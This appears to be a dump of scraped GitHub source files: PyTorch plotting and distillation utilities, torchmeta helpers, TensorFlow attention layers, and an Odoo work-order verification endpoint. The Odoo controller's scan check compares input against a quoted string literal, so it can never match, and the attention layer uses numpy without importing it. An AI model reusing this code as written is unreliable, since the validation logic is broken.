\"#026b00\", \"#ad17a1\", '#a80707',\n \"#00325c\", \"#e41a1c\", \"#008DF9\", \"#570950\", '#732929']\n\n color_list2 = ['#66BAFF', '#008cff', '#004c8b', '#00325c',\n '#FFB56B', '#ff8000', '#964b00', '#e41a1c',\n '#8BDD89', \"#04b000\", \"#026b00\", \"#008DF9\",\n \"#faa5f3\", \"#de4bd2\", \"#ad17a1\", \"#570950\",\n '#fa7f7f', '#fc3838', '#a80707', '#732929']\n\n # If there are more than 3 types of labels, we want to plot both cohort, and domains, so change color scheme.\n color_list = color_list2 if len(list(set(labels))) > config[\"n_cohorts\"] + 1 else color_list\n\n # Map class to legend texts. 
\"A1\" = Cohort-A in Domain-1\n c2l = {\"0\": \"A1\", \"1\": \"A2\", \"2\": \"A3\", \"3\": \"A4\",\n \"4\": \"B1\", \"5\": \"B2\", \"6\": \"B3\", \"7\": \"B4\",\n \"8\": \"C1\", \"9\": \"C2\", \"10\": \"C3\", \"11\": \"C4\",\n \"12\": \"D1\", \"13\": \"D2\", \"14\": \"D3\", \"15\": \"D4\",\n \"16\": \"E1\", \"17\": \"E2\", \"18\": \"E3\", \"19\": \"E4\", }\n\n # Used to adjust space for legends based on number of columns in the legend. ncol: subplot_adjust\n legend_space_adjustment = {\"1\": 0.9, \"2\": 0.9, \"3\": 0.75, \"4\": 0.65, \"5\": 0.65}\n\n # Initialize an empty dictionary to hold the mapping for color palette\n palette = {}\n # Map colors to the indexes.\n for i in range(len(color_list)):\n palette[str(i)] = color_list[i]\n # Make sure that the labels are 1D arrays\n y = labels.reshape(-1, )\n # Turn labels to a list\n y = list(map(str, y.tolist()))\n # Define number of sub-plots to draw. In this case, 2, one for PCA, and one for t-SNE\n img_n = 2\n # Initialize subplots\n fig, axs = plt.subplots(1, img_n, figsize=(12, 3.5), facecolor='w', edgecolor='k')\n # Adjust the whitespace around sub-plots\n fig.subplots_adjust(hspace=.1, wspace=.1)\n # adjust the ticks of axis.\n plt.tick_params(\n axis='both', # changes apply to the x-axis\n which='both',\n left=False, # both major and minor ticks are affected\n right=False,\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n\n # Flatten axes if we have more than 1 plot. Or, return a list of 2 axs to make it compatible with multi-plot case.\n axs = axs.ravel() if img_n > 1 else [axs, axs]\n\n # Get 2D embeddings, using PCA\n pca = PCA(n_components=2)\n # Fit training data and transform\n embeddings_pca = pca.fit_transform(embeddings) # if embeddings.shape[1]>2 else embeddings\n # Set the title of the sub-plot\n axs[0].title.set_text('Embeddings from PCA')\n # Plot samples, using each class label to define the color of the class.\n sns_plt = sns.scatterplot(x=embeddings_pca[:, 0], y=embeddings_pca[:, 1], ax=axs[0], palette=palette, hue=y, s=20,\n alpha=alpha)\n # Overwrite legend labels\n overwrite_legends(sns_plt, c2l, fig, ncol=ncol, title=legend_title, labels=legend_labels)\n # Get 2D embeddings, using t-SNE\n embeddings_tsne = tsne(embeddings) # if embeddings.shape[1]>2 else embeddings\n # Set the title of the sub-plot\n axs[1].title.set_text('Embeddings from t-SNE')\n # Plot samples, using each class label to define the color of the class.\n sns_plt = sns.scatterplot(x=embeddings_tsne[:, 0], y=embeddings_tsne[:, 1], ax=axs[1], palette=palette, hue=y, s=20,\n alpha=alpha)\n # Overwrite legend labels\n overwrite_legends(sns_plt, c2l, fig, ncol=ncol, title=legend_title, labels=legend_labels)\n # Remove legends in sub-plots\n axs[0].get_legend().remove()\n axs[1].get_legend().remove()\n # Adjust the scaling factor to fit your legend text completely outside the plot\n # (smaller value results in more space being made for the legend)\n plt.subplots_adjust(right=legend_space_adjustment[str(ncol)])\n\n # Get the path to the project root\n root_path = os.path.dirname(os.path.dirname(__file__))\n # Define the path to save the plot to.\n fig_path = os.path.join(root_path, \"results\", config[\"framework\"], \"evaluation\", \"clusters\", plt_name + \".png\")\n # Define tick params\n plt.tick_params(axis=u'both', which=u'both', length=0)\n # Save the plot\n plt.savefig(fig_path, bbox_inches=\"tight\")\n # Clear figure just in case if there is a follow-up plot.\n 
plt.clf()\n\n\ndef overwrite_legends(sns_plt, c2l, fig, ncol, title=None, labels=None):\n # Get legend handles and labels\n handles, legend_txts = sns_plt.get_legend_handles_labels()\n # Turn str to int before sorting ( to avoid wrong sort order such as having '10' in front of '4' )\n legend_txts = [int(d) for d in legend_txts]\n # Sort both handle and texts so that they show up in a alphabetical order on the plot\n legend_txts, handles = (list(t) for t in zip(*sorted(zip(legend_txts, handles))))\n # Turn int to str before using labels\n legend_txts = [str(i) for i in legend_txts]\n # Get new legend labels using class-to-label map\n new_labels = [c2l[legend_text] for legend_text in legend_txts]\n # Overwrite new_labels if it is given by user.\n new_labels = labels or new_labels\n # Define the figure title\n title = title or \"Cohorts/Domains\"\n # Overwrite the legend labels and add a title to the legend\n fig.legend(handles, new_labels, loc=\"center right\", borderaxespad=0.1, title=title, ncol=ncol)\n sns_plt.set(xticklabels=[], yticklabels=[], xlabel=None, ylabel=None)\n sns_plt.tick_params(top=False, bottom=False, left=False, right=False)\n\n\ndef domain_labels_for_tranlation(options, domain_label=[2]):\n # Assign each domain to a label: domain-1:0, domain-2:1 and so on.\n domain_labels = []\n # Repeat each for number of batch size so that we have label for each data point from each domain\n domain_labels = options[\"n_domains\"] * options[\"batch_size\"] * domain_label\n # Turn labels to torch tensor\n domain_labels = th.from_numpy(np.array(domain_labels))\n # Turn them into one-hot embeddings, shape: (3 x batch_size, number of domains)\n y = th.eye(options[\"n_domains\"])\n # Return one-hot encoded domain labels\n return y[domain_labels].to(options[\"device\"])\n\n\ndef save_np2csv(np_list, save_as=\"test.csv\"):\n # Get numpy arrays and label lists\n Xtr, ytr = np_list\n # Turn label lists into numpy arrays\n ytr = np.array(ytr, dtype=np.int8)\n # Get column names\n columns = [\"label\"] + list(map(str, list(range(Xtr.shape[1]))))\n\n # Concatenate \"scaled\" features and labels\n data_tr = np.concatenate((ytr.reshape(-1, 1), Xtr), axis=1)\n # Generate new dataframes with \"scaled features\" and labels\n df_tr = pd.DataFrame(data=data_tr, columns=columns)\n # Show samples from scaled data\n print(\"Samples from the dataframe:\")\n print(df_tr.head())\n # Save the dataframe as csv file\n df_tr.to_csv(save_as, index=False)\n # Print an informative message\n print(f\"The dataframe is saved as {save_as}\")\n\n\ndef append_tensors_to_lists(list_of_lists, list_of_tensors):\n # Go through each tensor and corresponding list\n for i in range(len(list_of_tensors)):\n # Convert tensor to numpy and append it to the corresponding list\n list_of_lists[i] += [list_of_tensors[i].cpu().numpy()]\n # Return the lists\n return list_of_lists\n\n\ndef concatenate_lists(list_of_lists):\n list_of_np_arrs = []\n # Pick a list of numpy arrays ([np_arr1, np_arr2, ...]), concatenate numpy arrs to a single one (np_arr_big),\n # and append it back to the list ([np_arr_big1, np_arr_big2, ...])\n for list_ in list_of_lists:\n list_of_np_arrs.append(np.concatenate(list_))\n # Return numpy arrays\n return list_of_np_arrs\n\n\ndef get_translated_outputs(Xtran, dlabels_raw):\n return Xtran[dlabels_raw == 0], Xtran[dlabels_raw == 1], Xtran[dlabels_raw == 
2]\n\n","repo_name":"talipucar/DomainAdaptation","sub_path":"utils/eval_utils.py","file_name":"eval_utils.py","file_ext":"py","file_size_in_byte":15711,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"13173807586","text":"from torchvision.transforms import Compose\nfrom torchmeta.utils.data.task import Task\n\ndef apply_wrapper(wrapper, task_or_dataset=None):\n if task_or_dataset is None:\n return wrapper\n\n from torchmeta.utils.data import MetaDataset\n if isinstance(task_or_dataset, Task):\n return wrapper(task_or_dataset)\n elif isinstance(task_or_dataset, MetaDataset):\n if task_or_dataset.dataset_transform is None:\n dataset_transform = wrapper\n else:\n dataset_transform = Compose([\n task_or_dataset.dataset_transform, wrapper])\n task_or_dataset.dataset_transform = dataset_transform\n return task_or_dataset\n else:\n raise NotImplementedError()\n\ndef wrap_transform(transform, fn, transform_type=None):\n if (transform_type is None) or isinstance(transform, transform_type):\n return fn(transform)\n elif isinstance(transform, Compose):\n return Compose([wrap_transform(subtransform, fn, transform_type)\n for subtransform in transform.transforms])\n else:\n return transform\n","repo_name":"tristandeleu/pytorch-meta","sub_path":"torchmeta/transforms/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":1879,"dataset":"github-code","pt":"3"} +{"seq_id":"9521527427","text":"import xmlrpc.client\nfrom .tl_api_signin import apisignin \nfrom odoo import http, _, exceptions , api, SUPERUSER_ID, models, fields\nimport json \n \nclass apicheckwo(http.Controller): \n def checkkw(self, kw): \n resultcode = 201\n creds = apisignin.get_credentials()\n gettoken = kw.get('token') ; getwoid =kw.get('woid'); getclientid = kw.get('client_id'); getsecretkey =kw.get('secret_key'); db_name = http.request.session.db \n result = True ; msg ='' ; header_fields = [] ; loginstate ='' ; ResUsersInstance = False\n userid = False ; url = 'http://127.0.0.1' \n mandatory_header = ['client_id','secret_key','token','scanresult', 'woid'] \n for mandatory_field in mandatory_header: \n if not kw.get(mandatory_field,False): header_fields.append(mandatory_field) \n if len(header_fields) > 0 : result = False; msg = \"(miss header %s\" %str(header_fields)+\")\" ; return result,resultcode, msg,False,False\n if getsecretkey != creds['secret_key'] : result = False; msg = \"(wrong secret_key)\" ; return result,resultcode, msg,False,False\n if getclientid != creds['client_id'] : result = False; msg = \"(ass wrong client_id)\" ; return result,resultcode, msg,False,False\n if len(gettoken) != 40 : result = False; msg = \"(token is in wrong format)\" ; return result,301 , msg,False,False\n ResUsersInstance = http.request.env['res.users'].sudo().search([('customtoken', '=', gettoken)])\n if ResUsersInstance.id == False : result = False; msg = \"(token: user not found)\" ; return result,301 , msg,False,False \n tokenowner = ResUsersInstance.login \n url = http.request.env['ir.config_parameter'].sudo().get_param('web.base.url') \n common = xmlrpc.client.ServerProxy('{}/xmlrpc/2/common'.format(url)) \n try: \n userid = common.authenticate(db_name, tokenowner, gettoken, {})\n except Exception as e:\n result = False; msg = \"(common.userid: failed to authenticate token and user)\" +str(e) ; return result,resultcode, msg,False,False\n datawo = 
http.request.env['tl.tr.draftwo'].sudo().search([('dwoid', '=', getwoid)])\n if len(datawo) == 0 : result = False;msg = \"(wo (\"+getwoid+\") return 0 row.)\" ; return result,resultcode, msg,False,False \n return result,resultcode,msg,ResUsersInstance,datawo\n\n @http.route('/api/checkWO/', methods=['POST'],type='http',auth='none', csrf=False) \n def checkwo(self, **kw): \n result, resultcode, errormsg, ResUsersInstance , datawo= self.checkkw(kw) \n dict={} \n if (result == False):\n dict={\"code\": resultcode, \"message\": \"Transaction Halted:\"+errormsg} \n kw =json.dumps(dict) \n return kw \n else: \n scanresult = kw.get('scanresult') \n datasesuai = False\n for record in datawo: \n if scanresult in ['record.chassisno, record.engineno']:\n # if scanresult in ['8998989100120']: \n datasesuai = True \n if (datasesuai) : return json.dumps({\"code\": 200, \"message\": \"data sesuai\" }) \n else : return json.dumps({\"code\": 201, \"message\": \"data tidak sesuai\"}) \n","repo_name":"erickindratara/tlsystem_clone","sub_path":"controllers/tl_api_checkwo.py","file_name":"tl_api_checkwo.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28210867233","text":"import tensorflow as tf\ndef shape_list(x):\n \"\"\"Return list of dims, statically where possible.\"\"\"\n x = tf.convert_to_tensor(x)\n # If unknown rank, return dynamic shape\n if x.get_shape().dims is None:\n return tf.shape(x)\n static = x.get_shape().as_list()\n shape = tf.shape(x)\n\n ret = []\n for i, dim in enumerate(static):\n if dim is None:\n dim = shape[i]\n ret.append(dim)\n return ret\nclass Attention(tf.keras.layers.Layer):\n \"\"\"Multi-headed attention layer.\"\"\"\n\n def __init__(self, hidden_size, num_heads, attention_dropout,return_attention=False):\n \"\"\"Initialize Attention.\n Args:\n hidden_size: int, output dim of hidden layer.\n num_heads: int, number of heads to repeat the same attention structure.\n attention_dropout: float, dropout rate inside attention for training.\n \"\"\"\n if hidden_size % num_heads:\n raise ValueError(\n \"Hidden size ({}) must be divisible by the number of heads ({}).\"\n .format(hidden_size, num_heads))\n\n super(Attention, self).__init__()\n self.hidden_size = hidden_size\n self.num_heads = num_heads\n self.attention_dropout = attention_dropout\n self.return_attention = return_attention\n\n def build(self, input_shape):\n \"\"\"Builds the layer.\"\"\"\n # Layers for linearly projecting the queries, keys, and values.\n self.q_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"q\")\n self.k_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"k\")\n self.v_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"v\")\n self.output_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"output_transform\")\n super(Attention, self).build(input_shape)\n\n def get_config(self):\n return {\n \"hidden_size\": self.hidden_size,\n \"num_heads\": self.num_heads,\n \"attention_dropout\": self.attention_dropout,\n 'return_attention':self.return_attention\n }\n\n def split_heads(self, x):\n \"\"\"Split x into different heads, and transpose the resulting value.\n The tensor is transposed to insure the inner dimensions hold the correct\n values during the matrix multiplication.\n Args:\n x: A tensor with shape [batch_size, length, hidden_size]\n Returns:\n A tensor with shape [batch_size, 
num_heads, length, hidden_size/num_heads]\n \"\"\"\n with tf.name_scope(\"split_heads\"):\n batch_size = tf.shape(x)[0]\n length = tf.shape(x)[1]\n\n # Calculate depth of last dimension after it has been split.\n depth = (self.hidden_size // self.num_heads)\n\n # Split the last dimension\n x = tf.reshape(x, [batch_size, length, self.num_heads, depth])\n\n # Transpose the result\n return tf.transpose(x, [0, 2, 1, 3])\n\n def combine_heads(self, x):\n \"\"\"Combine tensor that has been split.\n Args:\n x: A tensor [batch_size, num_heads, length, hidden_size/num_heads]\n Returns:\n A tensor with shape [batch_size, length, hidden_size]\n \"\"\"\n with tf.name_scope(\"combine_heads\"):\n batch_size = tf.shape(x)[0]\n length = tf.shape(x)[2]\n x = tf.transpose(x, [0, 2, 1, 3]) # --> [batch, length, num_heads, depth]\n return tf.reshape(x, [batch_size, length, self.hidden_size])\n\n def call(self, x, y, bias, training, cache=None,save_weights_to=None,return_attention=False):\n \"\"\"Apply attention mechanism to x and y.\n Args:\n x: a tensor with shape [batch_size, length_x, hidden_size]\n y: a tensor with shape [batch_size, length_y, hidden_size]\n bias: attention bias that will be added to the result of the dot product.\n training: boolean, whether in training mode or not.\n cache: (Used during prediction) dictionary with tensors containing results\n of previous attentions. The dictionary must have the items:\n {\"k\": tensor with shape [batch_size, i, key_channels],\n \"v\": tensor with shape [batch_size, i, value_channels]}\n where i is the current decoded length.\n Returns:\n Attention layer output with shape [batch_size, length_x, hidden_size]\n \"\"\"\n # Linearly project the query (q), key (k) and value (v) using different\n # learned projections. This is in preparation of splitting them into\n # multiple heads. Multi-head attention uses multiple queries, keys, and\n # values rather than regular attention (which uses a single q, k, v).\n q = self.q_dense_layer(x)\n k = self.k_dense_layer(y)\n v = self.v_dense_layer(y)\n\n if cache is not None:\n # Combine cached keys and values with new keys and values.\n k = tf.concat([tf.cast(cache[\"k\"], k.dtype), k], axis=1)\n v = tf.concat([tf.cast(cache[\"v\"], k.dtype), v], axis=1)\n\n # Update cache\n cache[\"k\"] = k\n cache[\"v\"] = v\n\n # Split q, k, v into heads.\n q = self.split_heads(q)\n k = self.split_heads(k)\n v = self.split_heads(v)\n\n # Scale q to prevent the dot product between q and k from growing too large.\n depth = (self.hidden_size // self.num_heads)\n q *= depth ** -0.5\n\n # Calculate dot product attention\n logits = tf.matmul(q, k, transpose_b=True)\n #print(logits.shape)\n #print(bias.shape)\n if bias is not None:\n logits += bias\n #print(logits.shape)\n \n # Note that softmax internally performs math operations using float32\n # for numeric stability. 
When training with float16, we keep the input\n # and output in float16 for better performance.\n weights = tf.nn.softmax(logits, name=\"attention_weights\")\n if training:\n weights = tf.nn.dropout(weights, rate=self.attention_dropout)\n attention_output = tf.matmul(weights, v)\n\n # Recombine heads --> [batch_size, length, hidden_size]\n attention_output = self.combine_heads(attention_output)\n\n # Run the combined outputs through another linear projection layer.\n attention_output = self.output_dense_layer(attention_output)\n output=None\n if not return_attention:\n output=attention_output\n else:\n batch_size,nh,s1,s2=shape_list(weights)\n weights= tf.reshape(weights, [batch_size,s1,s2*nh])\n output=[attention_output,weights]\n return output\n\n\nclass SelfAttention(Attention):\n \"\"\"Multiheaded self-attention layer.\"\"\"\n def call(self, x, bias, training, cache=None,return_attention=False):\n \n return super(SelfAttention, self).call(x, x, bias, \n training, \n cache,\n return_attention=return_attention)\n\n\n## Joint Attention layer\nimport tensorflow as tf\nclass JASSAttentionLayer(tf.keras.layers.Layer):\n def maskJassLayer(self,layer,attention_weight):\n # Mask out the layer \n mask = np.ones(shape=attention_weight.shape,dtype=np.float32)\n mask[:,layer,:,:,:]= np.zeros_like(mask[:,layer,:,:,:])\n layer_mask = tf.convert_to_tensor(mask)\n attention_weight*=layer_mask\n return attention_weight\n\n def __init__(self, \n hidden_size, \n num_heads, \n attention_dropout,\n nb_links,\n computation_mode=1,\n share_weights=False,\n share_query_weights=True,\n return_attention=False,\n ):\n if hidden_size % num_heads:\n raise ValueError(\n \"Hidden size ({}) must be divisible by the number of heads ({}).\"\n .format(hidden_size, num_heads))\n super(JASSAttentionLayer, self).__init__()\n self.hidden_size = hidden_size\n self.num_heads = num_heads\n self.attention_dropout = attention_dropout\n self.return_attention = return_attention\n self.computation_mode=computation_mode\n self.nb_links = nb_links\n self.share_weights = share_weights\n self.share_query_weights= share_query_weights\n self.is_hybrid = False\n \n print('Using normal JASS mode')\n if self.computation_mode not in [1,2,3,4,]:\n raise ValueError(\n \"Invalid Attention computation mode: choose from [1,2,3,4]\")\n \n \n def build(self, input_shape):\n \"\"\"Builds the layer.\"\"\"\n # Layers for linearly projecting the queries, keys, and values.\n self.q_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"q\") if self.share_query_weights else [tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"q_\"+str(i)) for i in range(self.nb_links)]\n self.output_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"output_transform\")\n \n if self.share_weights:\n self.k_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"k\")\n self.v_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"v\")\n else:\n self.k_dense_layer = [tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"k_\"+str(i)) for i in range(self.nb_links)]\n self.v_dense_layer = [tf.keras.layers.Dense(\n self.hidden_size, use_bias=False,name=\"v_\"+str(i)) for i in range(self.nb_links)]\n super(JASSAttentionLayer, self).build(input_shape)\n def get_config(self):\n return {\n 'nb_links':self.nb_links,\n 'computation_mode':self.computation_mode,\n \"hidden_size\": self.hidden_size,\n \"num_heads\": self.num_heads,\n \"attention_dropout\": 
self.attention_dropout,\n 'return_attention':self.return_attention\n }\n \n def split_heads(self, x):\n \"\"\"Split x into different heads, and transpose the resulting value.\n The tensor is transposed to insure the inner dimensions hold the correct\n values during the matrix multiplication.\n Args:\n x: A tensor with shape [batch_size, length, hidden_size]\n Returns:\n A tensor with shape [batch_size, num_heads, length, hidden_size/num_heads]\n \"\"\"\n with tf.name_scope(\"split_heads\"):\n batch_size = tf.shape(x)[0]\n length = tf.shape(x)[1]\n\n # Calculate depth of last dimension after it has been split.\n depth = (self.hidden_size // self.num_heads)\n\n # Split the last dimension\n x = tf.reshape(x, [batch_size, length, self.num_heads, depth])\n\n # Transpose the result\n return tf.transpose(x, [0, 2, 1, 3])\n \n \n def combine_heads(self, x):\n with tf.name_scope(\"combine_heads\"):\n batch_size = tf.shape(x)[0]\n length = tf.shape(x)[3]\n x = tf.transpose(x, [0, 3, 1, 2,4]) # --> [batch, length,num_links, num_heads, depth]\n #if not self.is_hybrid:\n if self.computation_mode in [1,3]:\n return tf.reshape(x, [batch_size, length, self.hidden_size])\n else:\n vv= tf.reshape(x, [batch_size, length, self.hidden_size*self.nb_links]) \n return vv\n #else:\n # if self.computation_mode in [1,3]:\n # return tf.reshape(x, [batch_size, length, 2*self.hidden_size])\n # else:\n # vv= tf.reshape(x, [batch_size, length, 2*self.hidden_size*self.nb_links]) \n return vv\n \n def call(self, x, y, bias, training, cache=None,save_weights_to=None,return_attention=False):\n computation_mode = self.computation_mode\n k= y\n v= y\n if self.share_query_weights:\n q = tf.expand_dims(self.split_heads(self.q_dense_layer(x)),1) #(bs,1,nb_heads,seq_len,depth)\n else:\n q = [tf.expand_dims(self.split_heads(self.q_dense_layer[index](x)),1) for index, vv in enumerate(k)]\n q = tf.concat(q,1) if len(q)>1 else q[-1]\n \n if self.share_weights:\n ks = [tf.expand_dims(self.split_heads(self.k_dense_layer(vv)),1) for index, vv in enumerate(k)]\n vs = [tf.expand_dims(self.split_heads(self.v_dense_layer(vv)),1) for index, vv in enumerate(v)]\n else:\n ks = [tf.expand_dims(self.split_heads(self.k_dense_layer[index](vv)),1) for index, vv in enumerate(k)]\n vs = [tf.expand_dims(self.split_heads(self.v_dense_layer[index](vv)),1) for index, vv in enumerate(v)]\n \n ks = tf.concat(ks,1) if len(ks)>1 else ks[-1] #(bs,nb_layers,nb_heads,seq_len,depth)\n vs = tf.concat(vs,1) if len(vs)>1 else vs[-1] #(bs,nb_layers,nb_heads,seq_len,depth)\n \n depth = (self.hidden_size // self.num_heads)\n q *= depth ** -0.5\n \n # Calculate dot product attention\n logits = tf.matmul(q, ks, transpose_b=True)\n if bias is not None:\n modif_bias = tf.expand_dims(bias,1)\n modif_bias = tf.concat([modif_bias for _ in range(len(v))],1)\n logits += modif_bias\n \n if computation_mode in [1,2]:\n joint_logits = tf.expand_dims(tf.reduce_sum(logits,axis=1),1)\n joint_weight = tf.nn.softmax(joint_logits, name=\"j_attention_weights\")\n if training:\n joint_weight = tf.nn.dropout(joint_weight, rate=self.attention_dropout)\n weights= joint_weight\n else:\n weights = tf.nn.softmax(logits, name=\"attention_weights\")\n if training:\n weights = tf.nn.dropout(weights, rate=self.attention_dropout)\n attention_output = tf.matmul(weights, vs)\n\n if computation_mode in [1,3]:\n attention_output= tf.expand_dims(tf.reduce_sum(attention_output,1),1)\n\n attention_output = self.combine_heads(attention_output)\n #print(attention_output.shape)\n attention_output = 
self.output_dense_layer(attention_output)\n #print(attention_output.shape,'Not hybrid')\n output=None\n if not return_attention:\n output=attention_output\n else:\n batch_size,nb_links,nh,s1,s2=shape_list(logits)\n weights= tf.reshape(logits, [batch_size,s1,nh,nb_links,s2])\n output=[attention_output,weights]\n return output","repo_name":"kaeflint/MLMHA","sub_path":"layers/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":14416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6873095996","text":"import torch\nfrom collections import OrderedDict,abc\nfrom tqdm import tqdm\nfrom torch import nn\ntry:\n from tensorboardX import SummaryWriter\nexcept ImportError:\n from torch.utils.tensorboard import SummaryWriter\nimport os, random, json\nimport numpy as np\nimport logging\nfrom typing import Optional, Dict, Union\nfrom .presets import *\nfrom .configurations import TrainingConfig, DistillationConfig\nimport random\nfrom .compatibility import mask_dtype, is_apex_available\n\nhas_apex = is_apex_available()\nif has_apex:\n from apex import amp\n\n\nlogger = logging.getLogger(\"Distillation\")\n#logger.setLevel(logging.INFO)\n\n#handler_stream = logging.StreamHandler()\n#handler_stream.setLevel(logging.INFO)\n#formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%Y/%m/%d %H:%M:%S')\n#handler_stream.setFormatter(formatter)\n#logger.addHandler(handler_stream)\n\nclass CustomMatch:\n def __init__(self, module_T, module_S, weight, loss,\n proj_func =None, proj_group = None):\n self.module_T = module_T\n self.module_S = module_S\n self.loss = loss,\n self.weight = weight,\n self.proj_func = proj_func\n if proj_group is None:\n self.proj_group = dict()\n else:\n self.proj_group = proj_group\n def to_dict(self):\n return {'module_T':self.module_T,\n 'module_S':self.module_S,\n 'weight':self.weight,\n 'loss':self.loss,\n 'proj_func':self.proj_func,\n 'proj_group':self.proj_group}\n @classmethod\n def from_dict(cls,dict_object):\n return cls(**dict_object)\n\n\nclass DistillationContext:\n def __init__(self):\n self.model_S = None\n self.model_T = None\n def __enter__(self):\n if isinstance(self.model_T,(list,tuple)):\n self.model_T_is_training = [model_t.training for model_t in self.model_T]\n for model_t in self.model_T:\n model_t.eval()\n elif isinstance(self.model_T,dict):\n self.model_T_is_training = {name:model.training for name,model in self.model_T.items()}\n for name in self.model_T:\n self.model_T[name].eval()\n else:\n self.model_T_is_training = self.model_T.training\n self.model_T.eval()\n\n if isinstance(self.model_S,(list,tuple)):\n self.model_S_is_training = [model_s.training for model_s in self.model_S]\n for model_s in self.model_S:\n model_s.eval()\n elif isinstance(self.model_S,dict):\n self.model_S_is_training = {name:model.training for name,model in self.model_S.items()}\n for name in self.model_S:\n self.model_S[name].eval()\n else:\n self.model_S_is_training = self.model_S.training\n self.model_S.train()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n #Restore model status\n if isinstance(self.model_T,(list,tuple)):\n for i in range(len(self.model_T_is_training)):\n self.model_T[i].train(self.model_T_is_training[i])\n elif isinstance(self.model_T,dict):\n for name,is_training in self.model_T_is_training.items():\n self.model_T[name].train(is_training)\n else:\n self.model_T.train(self.model_T_is_training)\n\n if 
isinstance(self.model_S,(list,tuple)):\n for i in range(len(self.model_S_is_training)):\n self.model_S[i].train(self.model_S_is_training[i])\n elif isinstance(self.model_S,dict):\n for name,is_training in self.model_S_is_training.items():\n self.model_S[name].train(is_training)\n else:\n self.model_S.train(self.model_S_is_training)\n\n\nclass AbstractDistiller(DistillationContext):\n def __init__(self, train_config: TrainingConfig,\n distill_config: DistillationConfig,\n model_T, model_S, adaptor_T, adaptor_S):\n super(AbstractDistiller, self).__init__()\n self.t_config = train_config\n self.d_config = distill_config\n\n self.model_T = model_T\n self.model_S = model_S\n self.adaptor_S = adaptor_S\n self.adaptor_T = adaptor_T\n\n self.kd_loss = KD_LOSS_MAP[self.d_config.kd_loss_type]\n\n self.local_rank = self.t_config.local_rank\n self.rank = 0\n if self.local_rank != -1:\n self.rank = torch.distributed.get_rank()\n if self.t_config.log_dir is not None and self.rank == 0:\n self.tb_writer = SummaryWriter(log_dir = self.t_config.log_dir)\n else:\n self.tb_writer = no_op\n \n self.print_freq = 20\n\n self.logits_cache = []\n\n\ndef select_logits_with_mask(logits_list, masks_list):\n output_logits = []\n if len(masks_list)==len(logits_list):\n for logits,mask in zip(logits_list,masks_list):\n if len(logits.shape)==3:\n mask = mask.unsqueeze(-1).expand_as(logits).to(mask_dtype)\n logits_select = torch.masked_select(logits,mask).view(-1,logits.size(-1))\n else:\n logits_select = logits #Logits_mask has no effect on logits of shape (batch_size, logits_to_be_softmaxed)\n output_logits.append(logits_select)\n elif len(masks_list)==1:\n mask = masks_list[0]\n for logits in logits_list:\n if len(logits.shape)==3:\n mask = mask.unsqueeze(-1).expand_as(logits).to(mask_dtype)\n logits_select = torch.masked_select(logits,mask).view(-1,logits.size(-1))\n else:\n logits_select = logits #Logits_mask has no effect on logits of shape (batch_size, logits_to_be_softmaxed)\n output_logits.append(logits_select)\n else:\n raise AssertionError(\"lengths of logits list and masks list mismatch\")\n return output_logits\n\n\nclass BasicAdaptor:\n def __init__(self):\n self.batch = None\n self.model_outputs = None\n def __call__(self,batch,model_outputs):\n self.batch = batch\n self.model_outputs = model_outputs\n def __getattr__(self, item):\n raise NotImplementedError\n\n\ndef post_adaptor(dict_object):\n if 'logits' in dict_object:\n logits = dict_object['logits']\n if not isinstance(logits,(list,tuple)):\n dict_object['logits'] = [ logits ]\n if 'logits_mask' in dict_object:\n logits_mask = dict_object['logits_mask']\n if not isinstance(logits_mask,(list,tuple)):\n dict_object['logits_mask'] = [ logits_mask ]\n if 'losses' in dict_object:\n losses = dict_object['losses']\n if not isinstance(losses,(list,tuple)):\n dict_object['losses'] = [ losses ]\n if 'labels' in dict_object:\n labels = dict_object['labels']\n if not isinstance(labels,(list,tuple)):\n dict_object['labels'] = [ labels ]\n return dict_object\n\n\ndef probability_shift_(tensor, labels): # In-place operation. 
shape (batch_size, num_classes), (batch_size,)\n if len(tensor.shape)==2:\n max_position = tensor.argmax(dim=-1) # shape (batch_size,)\n index = torch.arange(tensor.size(0)).to(tensor.device)\n max_clone = tensor[index,max_position].clone()\n truth_clone = tensor[index,labels].clone()\n\n tensor[index,max_position] = truth_clone\n tensor[index,labels] = max_clone\n return tensor\n\n elif len(tensor.shape)==3: # shape (batch_size, length, num_classes)\n original_shape = tensor.size()\n\n tensor = tensor.view(-1,tensor.size(-1)) # (batch_size * length, num_classes)\n\n max_position = tensor.argmax(dim=-1) # shape (batch_size * length, )\n labels = labels.view(-1) # (batch_size * length, )\n nonneg_labels = torch.where(labels<0, max_position, labels)\n\n index = torch.arange(tensor.size(0)).to(tensor.device) # (batch_size * length)\n\n max_clone = tensor[index,max_position].clone()\n truth_clone = tensor[index,nonneg_labels].clone()\n\n tensor[index,max_position] = truth_clone\n tensor[index,nonneg_labels] = max_clone\n tensor = tensor.view(original_shape)\n return tensor\n else:\n raise TypeError(\"Rank of tensor must be 2 or 3\")\n\nclass no_op:\n @staticmethod\n def add_scalar(*args, **kwargs):\n pass\n\ndef move_to_device(batch, device):\n r\"\"\"Puts each data field to the device\"\"\"\n if isinstance(batch, torch.Tensor):\n return batch.to(device)\n elif isinstance(batch,(list,tuple)):\n return tuple(move_to_device(item,device) for item in batch)\n elif isinstance(batch, 